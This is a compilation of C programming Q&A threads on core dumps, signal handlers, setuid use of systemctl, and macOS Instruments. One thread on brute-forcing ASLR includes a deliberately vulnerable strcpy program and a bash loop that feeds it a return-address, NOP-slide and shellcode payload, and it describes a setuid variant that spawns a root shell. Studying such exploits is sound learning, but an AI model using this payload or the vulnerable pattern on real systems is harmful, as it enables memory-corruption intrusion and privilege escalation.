Dump core on SIGSEGV (in C)?

How can I dump core when my program receives the SIGSEGV signal? (The server that runs my program has very limited permissions, so core dumps are disabled by default.)
I have written the following using gcore, but I would like to use C functions instead. Can I somehow catch the core dump and write it to a folder somewhere?
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void segfaulthandler(int parameter)
{
    char gcore[50];
    sprintf(gcore, "gcore -s -c \"core\" %u", (unsigned)getpid());
    system(gcore);
    exit(1);
}

int main(void)
{
    signal(SIGSEGV, segfaulthandler);
}

Unless there's a hard limit preventing you, you could use setrlimit(RLIMIT_CORE, ...) to raise the soft limit and enable core dumps - this corresponds to running ulimit -c in the shell.
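For example, a minimal sketch (assuming a POSIX system) that raises the core-dump soft limit as far as the hard limit allows:

#include <stdio.h>
#include <sys/resource.h>

int main(void)
{
    struct rlimit rl;

    /* Read the current core-dump limits, then raise the soft
       limit up to whatever the hard limit permits. */
    if (getrlimit(RLIMIT_CORE, &rl) == 0) {
        rl.rlim_cur = rl.rlim_max;
        if (setrlimit(RLIMIT_CORE, &rl) != 0)
            perror("setrlimit");
    } else {
        perror("getrlimit");
    }
    return 0;
}

Call this early in main(); if the hard limit itself is 0, only a privileged process can raise it.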

On Linux, you can typically do:
$ ulimit -c unlimited
The resulting core file will be written in the current working directory of the process when the signal is received.

Related

Is there a system call to run systemctl in a C program (not the system() function)?

I am on an Ubuntu 22.04 server. I want to run:
systemctl restart someService
but want to do so in a C program.
Intuitively I tried:
system("systemctl restart someService")
This did not work even though my program has its setuid bit set to root, because systemctl itself does not have the setuid bit set.
I would like to write a program and set its uid to root so that anyone can execute it to restart a certain system service. That seems possible only with some direct function, not the system() call as used above. Any suggestions?
I don't think there is a system call that can do the job of systemctl in general. I think your approach of calling the systemctl command from your program is correct, but I am not getting into the security considerations here: you should be really careful when writing set-uid programs.
Now, the main issue with your code is that system() should not be used from set-uid binaries, because it doesn't let you control the environment variables, which can be set maliciously before your program is called in order to change the behavior of the invoked process. Besides that, system() calls /bin/sh to run your command, which on some versions of Linux drops privileges, as mentioned on the man page linked above. The right approach is to use the execve family of functions, which offer more control and do not spawn a shell. What you need to do can be done in the following way:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char *argv[]) {
    setuid(0);                      /* make real and effective ids root */
    setgid(0);
    char *newargv[] = {"/usr/bin/systemctl", "restart", "someService", NULL};
    char *newenviron[] = { NULL };  /* empty environment */
    execve(newargv[0], newargv, newenviron);
    perror("execve");               /* execve() returns only on error */
    exit(EXIT_FAILURE);
}
Notice the empty (or pure) environment above. It is worth noting that execve does not return unless there is an error. If you need the exit status of the systemctl command, you will have to combine this with fork, as sketched below.
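A minimal sketch of that fork-and-wait combination (reusing the hard-coded service name from above; the setuid handling is omitted here and error checking is kept minimal):

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void) {
    char *newargv[] = {"/usr/bin/systemctl", "restart", "someService", NULL};
    char *newenviron[] = { NULL };
    pid_t pid = fork();

    if (pid < 0) {
        perror("fork");
        exit(EXIT_FAILURE);
    }
    if (pid == 0) {                 /* child: replace image with systemctl */
        execve(newargv[0], newargv, newenviron);
        perror("execve");           /* reached only if execve failed */
        _exit(127);
    }

    int status;                     /* parent: wait for systemctl to finish */
    if (waitpid(pid, &status, 0) == pid && WIFEXITED(status))
        printf("systemctl exited with status %d\n", WEXITSTATUS(status));
    return 0;
}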

Core dump redirect to file

I am invoking make from my C program, which in turn executes another program. I am redirecting both standard out and standard error to a file. However, when the program run by make terminates due to a segmentation fault, a core dump is generated and a message is printed to the console (standard out) of the main program that invokes make.
How can I get around this and not have the core-dump message show on the console?
The following is my code to invoke make:
int pid = fork();
if (pid == 0) {
    dup2(make_logs, 1);   /* send the child's stdout to the log file */
    dup2(make_logs, 2);   /* send the child's stderr to the log file */
    close(make_logs);
    execvp(args[0], args);
}
Where make_logs is the file descriptor returned by open.
Thanks
I would try to fix the core dump rather than suppress the message, but the message about the segmentation fault is generated by the shell (which detects the exit status of the child and recognizes a core-dump situation), so you can suppress it by installing your own program that handles the fork() and wait() rather than having the shell do the work.
To suppress the core dump itself, just use limit coredumpsize 0 (that is csh syntax; the bash equivalent is ulimit -c 0).
Sample of suppression (sloppy code; you should really be checking for errors):
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    int pid;

    if ((pid = fork()) > 0)
        wait(NULL);                 /* parent: reap the child ourselves */
    else if (pid == 0) {
        execl("program-that-cdumps", "program-that-cdumps", (char *)0);
        perror("failed in execl");
    } else
        perror("failed in fork");
    return 0;
}
Read the core(5) and signal(7) man pages.
Compile all your programs with gcc -Wall -g. Then use
file core
to understand which binary dumped the core. It probably says something like core dump from foo, telling you that program foo dumped the core. Then start a post-mortem debugger on it:
gdb foo core
and use the common gdb commands (notably bt to backtrace, p to print, etc.).
The dumped core message is given by some shell (or perhaps by make when it is acting like a shell). The core file itself is not output to stdout (it is a big binary file).
If you wish to avoid the core dump (which IMHO is a bad idea: a core dump is a good symptom of something going wrong), you could call the setrlimit(2) syscall with RLIMIT_CORE and a 0 limit after your fork and before the execvp, as sketched below. I believe you should not do that (or at least should have some way of configuring things so that setrlimit is not called: sometimes you really need the core dump to debug the problem).
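For illustration, a sketch of the questioner's child branch with that call added (pid, make_logs and args are the variables from the question's code; this assumes an extra #include <sys/resource.h>):

if (pid == 0) {
    /* Disable core dumps in the child only, before exec'ing make. */
    struct rlimit rl = { 0, 0 };    /* soft and hard core limits both 0 */
    setrlimit(RLIMIT_CORE, &rl);

    dup2(make_logs, 1);
    dup2(make_logs, 2);
    close(make_logs);
    execvp(args[0], args);
}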
You should fix the problem that causes the core dump, not try to avoid the dumped core message!
If you run make on a user-provided Makefile, so that the core dump comes from a user program, you really want to keep the user informed that a core dump did happen, so you should keep the dumped core message.

ASLR brute force

I just read about Address Space Layout Randomization and I tried a very simple script to try to brute-force it. Here is the program I used to test a few things.
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buf[8];
    printf("&buf = %p\n", buf);
    if (argc > 1 && strcpy(buf, argv[1]));
    return 0;
}
I compiled it with this command:
gcc -g -fno-stack-protector -o vul vul.c
I made sure ASLR was enabled:
$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
Then, I came up with this simple script:
str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
. "\x90"x65536 \
. "\x31\xc0\x40\x89\xc3\xcd\x80"'`
while [ $? -ne 1 ]; do
./vul $str
done
The format is
return address many times | 64KB NOP slide | shellcode that runs exit(1)
After running this script for a few seconds, it exits with error code 1, as I wanted. I also tried other shellcodes that call execv("/bin/sh", ...) and was successful as well.
I find it strange that it's possible to create such a long NOP slide even after the return address. I thought ASLR was more effective; did I miss something? Is it because the address space is too small?
EDIT: I did some additional research and here is what I found:
I asked a friend to run this code using -m32 -z execstack on his 64-bit computer, and after changing the return address a bit, he got the same results.
Even though I did not use -z execstack, I managed to execute the shellcode. I made sure of that by using different shellcodes, which all did what they were supposed to do (even the well-known scenario: chown root ./vul, chmod +s ./vul, a shellcode that runs setreuid(0, 0) then execv("/bin/sh", ...), and finally whoami returning 'root' in the spawned shell).
That is quite strange, since execstack -q ./vul tells me the executable-stack flag bit is not set. Does anyone have an idea why?
First of all, I'm a bit surprised that you do not need to pass the option -z execstack to the compiler to get the shellcode to execute the exit(1).
Moreover, I guess you are on a 32-bit machine, as you did not pass the option -m32 to gcc to get 32-bit code.
Finally, I ran your program without success (I waited much more than a few seconds).
So, I'm a bit doubtful about your conclusion (unless you are running a very peculiar Linux system or may simply have been lucky).
Anyway, there are two main things that you have not mentioned:
Having a bug that offers an unlimited exploitation window is quite rare.
Most modern systems run on amd64 (64-bit) processors, which drastically lowers the probability of hitting the NOP zone.
You may take a look at the section "ASLR Effectiveness" on the ASLR's Wikipedia page.
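For a rough sense of the numbers (an illustrative estimate, assuming 32-bit Linux, where the stack top is randomized over roughly 8 MB, i.e. about 2^23 bytes): a 64 KB NOP slide covers 2^16 bytes, so each guessed address has on the order of a 2^16 / 2^23 = 1/128 chance of landing inside the slide, and a retry loop like the one above is expected to succeed after roughly a hundred attempts, i.e. within seconds. On 64-bit systems the randomized range is enormously larger, which is why the answer above singles out amd64.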

Core dump is not working

When I run programs with segfaults, I get the error message Segmentation fault: 11. For some reason, I'm not getting the (core dumped) message. I tried running the shell command ulimit -c unlimited, but I still get the same error and it doesn't say core dumped. I'm new to GDB, so I tried it with a simple program:
/* coredump.c */
#include <stdio.h>

int main(void) {
    int *point = NULL;
    *point = 0;     /* write through a null pointer: guaranteed segfault */
    return 0;
}
But when I compile using:
gcc coredump.c -g -o coredump
And run it, it still says Segmentation fault: 11.
Is it still creating a core dump somewhere I don't know about? I want to be able to use gdb coredump core.
Look at this link:
How to generate a core dump in Linux when a process gets a segmentation fault?
Options include:
ulimit -c unlimited (the default is 0, meaning no core files are generated)
the directory for the dump must be writable. By default this is the current directory of the process, but that may be changed by setting /proc/sys/kernel/core_pattern (see the sketch after this list).
in some conditions, the kernel value in /proc/sys/fs/suid_dumpable may prevent the core from being generated.
"man core" for other options
find / -name core -print 2> /dev/null to search your filesystem for core files
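For a quick check, a minimal C sketch (assuming a Linux /proc filesystem; on macOS, cores normally land in /cores instead) that prints the current pattern:

#include <stdio.h>

int main(void)
{
    char pattern[256];
    FILE *f = fopen("/proc/sys/kernel/core_pattern", "r");

    if (f != NULL) {
        if (fgets(pattern, sizeof(pattern), f))
            printf("core_pattern: %s", pattern);
        fclose(f);
    } else {
        perror("fopen");   /* not a Linux system, or /proc unavailable */
    }
    return 0;
}

If the pattern starts with a |, the kernel pipes the core to a program (such as apport or systemd-coredump) rather than writing a file in the working directory.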
I presume you're running Linux, and I presume you're executing the binary in a directory where you have write permission.
So my top two guesses would be: 1) ulimit -c unlimited isn't getting set, or is being overridden, or 2) the core files are being generated but going somewhere else.
The above suggestions should help. Please post back what you find!
If you're running the program that crashes from the shell, then you should follow the guidelines in Apple's Tech Note TN2124, which I found out about in the answer to SO2207233.
There are a few key points:
You need to set ulimit -c unlimited in bash (same effect, different command in tcsh).
You need to set the permissions on the /cores directory so that you can create files in it. The default permissions are 1775; you need 1777. The 1 indicates the sticky bit is set.
The core dumps are then created in /cores suffixed with a PID (/cores/core.5312, for example).
If you want programs launched graphically to dump core when they crash, then you need to create /etc/launchd.conf if it does not already exist, and add a line limit core unlimited to the file. Again, see the information in the Tech Note for more details.
Watch it; core dumps are huge! Consider this not very complicated or big program:
#include <stdio.h>

int main(void)
{
    int *i = 0;
    int j = 0;
    printf("i = %d, j = %d, i / j = %d\n", *i, j, *i / j);
    return 0;
}
The core dump from this is nearly 360 MB.
Using gcc, if you add the flag:
gcc -g
you get debugging information that gdb can use together with the core dump. (The -dH flag is a gcc developer option that makes the compiler itself dump core on an internal error; it does not make your program generate a core dump.)
Sometimes core files are not stored in the current directory and may follow a different naming rule;
sysctl -a | grep kern.core
may give hints as to where your core files are stored.

How to use Instruments and display the console in command-line applications [duplicate]

This question already has answers here:
How can I see the output of an OS X program being run via the Time Profiler in Instruments?
(2 answers)
I'm using Xcode on OS X to develop command-line C applications. I would also like to use Instruments to profile and find memory leaks.
However, I couldn't find a way to display the console when launching the application from within Instruments. I'm also unable to attach to a running command-line process (it exits with an error).
Here's some example code:
#include <stdio.h>
#include <signal.h>
#include <stdlib.h>
#include <setjmp.h>

static sigjmp_buf jmpbuf;

void handler(int sig) {
    char c[BUFSIZ];
    printf("Got signal %d\n", sig);
    printf("Deseja sair? (s/n) ");      /* "Do you want to quit? (y/n)" */
    fgets(c, sizeof(c), stdin);
    if (c[0] == 's') {
        exit(0);
    } else {
        siglongjmp(jmpbuf, 1);
    }
}

int main(void) {
    char buf[BUFSIZ];
    signal(SIGINT, handler);
    sigsetjmp(jmpbuf, 1);
    while (1) {
        printf(">>>");
        fgets(buf, sizeof(buf), stdin);
        printf("Introduziu: %s\n", buf);    /* "You entered: %s" */
    }
    return 0;
}
Here's the error I got after launching Instruments and trying to attach to the running process in Xcode:
[Switching to process 1475]
[Switching to process 1475]
Error while running hook_stop:
sharedlibrary apply-load-rules all
Error while running hook_stop:
Invalid type combination in ordering comparison.
Error while running hook_stop:
Invalid type combination in ordering comparison.
Error while running hook_stop:
Error while running hook_stop:
Error while running hook_stop:
Error while running hook_stop:
Error while running hook_stop:
Error while running hook_stop:
Error while running hook_stop:
Unable to disassemble __CFInitialize.
Any thoughts?
It's a little late to contribute to this old thread; however, I have found that the best way of profiling a command-line utility is to use iprofiler (see its manpage). This allows data to be collected from the command line simply by prepending this to the command:
iprofiler -leaks -d $HOME/tmp
(I have a private temporary directory at $HOME/tmp, so you might need to use /tmp or leave the -d command-line option off altogether.)
My test scripts automatically add that to the command line if $FINDLEAKS is defined (and prepend valgrind if running under Linux).
This then generates a .dtps file (actually a directory) which can be loaded and analysed using Instruments.
If you are compiling with clang, simply add both -O3 and -g (clang doesn't support the -pg command-line option).
You can change the output in the Options dropdown when choosing your target. The output will appear in the system Console (Applications/Utilities/Console).
